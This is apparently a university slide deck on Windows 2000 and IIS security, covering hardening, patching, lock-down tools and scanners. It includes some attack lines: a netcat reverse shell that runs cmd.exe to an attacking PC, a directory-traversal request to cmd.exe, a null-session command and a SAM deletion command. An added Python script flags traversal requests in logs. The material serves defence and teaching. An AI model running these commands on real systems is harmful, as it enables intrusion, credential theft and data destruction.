Matthew Cook
Loughborough University
http://www.escarpment.net/
1
Introduction
Loughborough University
http://www.lboro.ac.uk/computing/
2
Security @ Lboro
✦ Evaluation of Security Service/Policy
✦ Demand for Windows and Linux security advice
✦ Need for other OS security advice
3
Windows 2000 Security
✦ Overview of General Security Threats
✦ Workstation Security
✦ Server Security
✦ IIS Security
✦ Security Tools
4
Physical Security
5
Security Threats
✦ Denial of Service
✦ Theft of information
✦ Modification
6
Security Holes
✦ Physical Security Holes
✦ Software Security Holes
✦ Social Engineering
✦ Complacency
7
Workstation Security
8
Workstation Security
✦ Physical Security
✦ BIOS
✦ Service Packs and Hot fixes
✦ NTFS ACLS
✦ Policies and Profiles
✦ Security Templates
✦ Auditing
✦ Threats
9
Service Packs and Hot fixes
✦ Ensure you have the latest ‘evaluated’ service packs and hot fixes.
✦ Check the model periodically
✦ Hfnetchk Tool
10
NTFS ACLS
✦ Ensure you use NTFS
✦ Partition your drives per application
✦ Example
11
Policies and Profiles
✦ NT Policy files are different from GPOs (Group Policy Objects) in Windows 2000
✦ LGPO located in:
%windir%\system32\grouppolicy
✦ ADGPO located in:
%windir%\system32\sysvol\camford\policies
✦ Demonstration
12
Security Templates
✦ Use ‘Security Settings’ applet to apply
✦ Located in %windir%\security\templates
✦ Demonstration
13
Security Templates…
✦ Setup security – Default settings
✦ Compatws – Compatible
14
Auditing & Event Logs
✦ Use the ‘Security Settings’ applet to ensure the Audit Policy has been configured
✦ Check the Event Viewer regularly
✦ URL: http://www.foundstone.com/
✦ URL: http://www.tntsoftware.com/
15
Threats
✦ PipeUpAdmin and PipeUpSAM
✦ Netddemsg
✦ EFS
✦ BIOS Passwords
16
PipeUpAdmin & PipeUpSAM
✦ Uses a vulnerability in Named Pipes in the Service Control Manager (SCM)
✦ Adds user to Administrator Group
✦ URL: http://www.dogmile.com/files/
17
Netddemsg
✦ Uses vulnerability in NetDDE
✦ Provides cmd in SYSTEM context
18
EFS
✦ Changing the password of the recovery agent (Administrator)
✦ Changing the password of the user
19
DOS Boot Disc
✦ DOS NTFS drivers bypass NTFS ACLS
✦ Allows removal of the SAM
del %windir%\system32\config\sam
✦ Allows extraction of the SAM
✦ URL: http://www.sysinternals.com/
✦ URL: http://www.esiea.fr/public_html/Christophe.GRENIER/
20
Linux Boot Disc
✦ Edit SAM password hashes
✦ Disable SYSKEY
✦ URL: http://home.eunet.no/~pnordahl/
21
BIOS Passwords
✦ Even a BIOS password is not secure
✦ Check for vulnerabilities
✦ Upgrade BIOS
✦ URL: http://www.esiea.fr/public_html/Christophe.GRENIER/
22
Server Security
23
Server Security
✦ Advice for Workstation Security
✦ NetBIOS/SMB Services
✦ SNMP Vulnerabilities
✦ IPSec
24
NetBIOS/SMB Services
✦ NetBIOS Name Service [Port UDP 137]
✦ NetBIOS Session Service [Port TCP 139]
25
NetBIOS/SMB Services…
Null Authentication:
net use \\camford\IPC$ "" /u:""
✦ Famous tools like ‘Red Button’
26
NetBIOS/SMB Services…
✦ Dumpsec from Somarsoft
✦ URL: http://www.somarsoft.com
✦ URL: http://razor.bindview.com/
27
NetBIOS/SMB Services…
To disable NetBIOS:
2. Select ‘Disable NetBIOS’ in the WINS tab of advanced TCP/IP properties.
3. Deselect ‘File and Print sharing’ in the advanced settings of the ‘Network and Dial-up connections’ window.
28
NetBIOS/SMB Services…
30
Hfnetchk…
31
Hfnetchk…
✦ Default scan of local host (pre-downloaded XML)
hfnetchk -x mssecure.xml
✦ Default scan of lboro domain
hfnetchk -d lboro
✦ Verbose scan of local host
hfnetchk -v -x mssecure.xml
✦ Verbose scan including installed hot fixes
hfnetchk -v -a b -x mssecure.xml
32
Hfnetchk…
✦ Test problems
hfnetchk -z -v -x mssecure.xml
✦ XML File Download
http://download.microsoft.com/download/xml/security/1.0/nt5/en-us/mssecure.cab
✦ Using an internal copy of the XML
hfnetchk -x http://camford.ac.uk/mssecure.xml
hfnetchk -x s:\camford\mssecure.xml
33
QChain
Supported by:
✦ Windows NT 4.0
✦ Windows 2000
34
QChain…
✦ Run the hot fix with -z (no reboot) and -m (quiet mode)
✦ Run qchain and then reboot
✦ Create a log using qchain [logname]
✦ Create batch files on a central server
✦ URL: http://www.microsoft.com/Downloads\Release.asp?ReleaseID=29821
35
SNMP Vulnerabilities
✦ Simple Network Management Protocol
✦ snmpwalk camford public .1.3.6.1.4.1.77.1.2.25
✦ SNMP Utilities in Resource Kit
✦ Turn off SNMP services
36
SNMP Vulnerabilities…
37
AD Vulnerabilities
✦ Listing of AD contents using ldp.exe
✦ Ldp is contained on the Resource Kit
38
IPSec
✦ Currently investigating
✦ Linux Connectivity using FreeS/WAN
✦ URL: http://www.freeswan.org/
✦ URL: http://airsnort.sourceforge.net/
39
IIS Security
40
IIS Security
✦ History
✦ Recent Worms
✦ URL Scan
✦ The Future
41
IIS History
✦ IIS 2.0 Installed by NT 4.0
✦ IIS 3.0 followed by more common IIS 4.0
✦ http://camford/scripts/upload.asp
✦ http://camford/scripts/cmdasp.asp
✦ GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
✦ URL: http://www.sensepost.com/
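A defender-side check for the request shown on this slide, added here as an example that is not from the original deck: it scans constructed W3C log lines, decoding percent-encoding repeatedly and collapsing ‘..’ (the normalisation step URL Scan performs before matching) so that encoded variants of the same cmd.exe request are flagged too. The log format, the sample lines and the SENSITIVE pattern are assumptions.

```python
"""Flag directory-traversal / cmd.exe requests in IIS W3C log lines.

Added example, not part of the original slides. The log lines below are
constructed; the sensitive-path pattern is an assumption for illustration.
"""
import posixpath
import re
from urllib.parse import unquote

# Constructed sample lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2001-10-01 09:12:01 10.0.0.5 GET /default.htm - 200
2001-10-01 09:12:07 10.0.0.9 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200
2001-10-01 09:12:09 10.0.0.9 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir 404
2001-10-01 09:12:15 10.0.0.9 GET /scripts/%2e%2e/%2e%2e/winnt/system32/cmd.exe /c+dir 200
2001-10-01 09:13:00 10.0.0.5 GET /images/logo.gif - 200
"""

# Paths that should never be reachable from a web root (assumed pattern).
SENSITIVE = re.compile(r"(cmd\.exe|/winnt/system32/)", re.IGNORECASE)


def decode(uri_stem: str) -> str:
    """Undo percent-encoding until stable (catches %255c -> %5c -> '\\')."""
    decoded = uri_stem
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    # IIS accepts '\' as a path separator, so treat it like '/'.
    return decoded.replace("\\", "/")


def normalise(uri_stem: str) -> str:
    """Decoded path with '.' and '..' segments collapsed."""
    return posixpath.normpath(decode(uri_stem))


def is_suspicious(uri_stem: str) -> bool:
    """True if the request escapes its directory or targets a sensitive path."""
    decoded = decode(uri_stem)
    escapes = "/.." in decoded or decoded.startswith("..")
    return escapes or SENSITIVE.search(normalise(uri_stem)) is not None


def scan_log(text: str) -> list:
    """Return (client, method, normalised path, query, status) for each hit."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 7:
            continue  # skip headers, comments and malformed lines
        _date, _time, client, method, stem, query, status = parts[:7]
        if is_suspicious(stem):
            hits.append((client, method, normalise(stem), query, status))
    return hits
```

Note that the double-encoded request was answered with a 404 but is still reported, which is the behaviour wanted when the log is used for detection rather than damage assessment.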
45
System Attacks…
✦ Obtaining a remote shell
✦ Attacking PC:
nc -l -p 1234
✦ Camford:
nc.exe -v -e cmd.exe <attackingpc> 1234
✦ URL: http://www.atstake.com/research/tools/
46
System Attacks…
✦ Shell is in the context of IUSR_camford
✦ ISAPI.dll – RevertToSelf (Horovitz)
✦ Upload using upload.asp
✦ http://camford/scripts/idq.dll
✦ Version 2 coded by Foundstone
✦ http://camford/scripts/idq.dll?
✦ Patch Bulletin: MS01-26
✦ NOT included in Windows 2000 SP2
47
IIS Lock Down Tool
✦ Automatic ‘Lock Down’
✦ Locks down IIS 4.0 and IIS 5.0
✦ Express ‘lock down’ for simple web sites
✦ Custom ‘lock down’ for more complex servers
✦ Undo facility to reverse last ‘lock down’
✦ URL: http://www.microsoft.com/Downloads\Release.asp?ReleaseID=32362
48
IIS Lock Down Tool…
Disable:
✦ Active Server Pages
✦ Index Server Interface
✦ Server Side Includes
✦ Internet Data Connector
✦ Internet Printing
✦ HTR Scripting
Remove:
✦ Sample Web Files
✦ Script Virtual Directory
✦ MSADC Directory
✦ WebDAV
Set Permissions on:
✦ Exe files
✦ Content Directories
49
URL Scan
✦ ISAPI filter scans incoming HTTP requests
✦ Filtered based on rule set
✦ New rules easily added
✦ Default urlscan.ini suitable for static pages
✦ Restart service when changes made
✦ 404 and logged request for matched rules
✦ URL: http://www.microsoft.com/Downloads\Release.asp?ReleaseID=32571
50
URL Scan…
Filter on:
✦ The request method (verb)
✦ File Extension
✦ URL Encoding
51
The Future
✦ Gartner report recommends ditching IIS
✦ Rewrite of IIS on the cards for version 6
52
Security Tools
53
Security Tools
✦ Snort
✦ CIS and Typhon
✦ Pwdump
✦ Fport
✦ L0pht Crack
✦ Nmap
✦ Nessus
✦ Pandora
54
Snort
✦ IDS – Intrusion Detection System
✦ Libpcap packet sniffer and logger
✦ Open Source
55
Snort…
58
CIS and Typhon
✦ Typhon, formerly Cerberus Internet Scanner
✦ Written by David Litchfield
✦ URL: http://www.nextgenss.com/
✦ Demonstration
59
CIS and Typhon
✦ Web Checks
✦ FTP Checks
✦ SMTP Checks
✦ POP3 Checks
✦ NT Checks
✦ NetBIOS Checks
✦ MS SQL Checks
✦ SNMP Checks
✦ RPC Checks
✦ Portscan (TCP/UDP)
✦ Finger Checks
✦ DNS Checks
✦ Commercial Version
60
Pwdump
✦ Version 3 (e = encrypted)
✦ Developed by Phil Staubs and Erik
Hjelmstad
✦ Based on pwdump and pwdump2
✦ URL: http://www.ebiz-tech.com/html/pwdump.html
61
Pwdump…
✦ Needs Administrative Privileges
✦ Extracts hashes even if SYSKEY is installed
62
Fport
✦ Reports on all open TCP and UDP ports
✦ Maps Port to Application
✦ URL: http://www.foundstone.com/
✦ Demonstration
63
L0pht Crack
✦ Password Auditing and Recovery
✦ Crack Passwords from many sources
✦ Registration $249
✦ URL: http://www.atstake.com/research/lc3/
✦ Demonstration
64
L0pht Crack…
✦ Remote Machine
✦ SAM File
✦ SMB Sniffer
✦ PWDump file
65
Nmap
✦ Port Scanning Tool
✦ Stealth scanning, OS Fingerprinting
✦ Open Source
✦ URL: http://www.insure.org/nmap/
66
Nmap…
67
Nessus
✦ Remote security scanner similar to Typhon
✦ Very comprehensive
✦ Open Source
✦ URL: http://nessus.org/
68
Pandora
✦ Not strictly Windows 2000 Security
✦ Runs on either Unix or Win32
✦ Open Source
✦ URL: http://www.nmrc.org/pandora/
69
Questions and Answers
70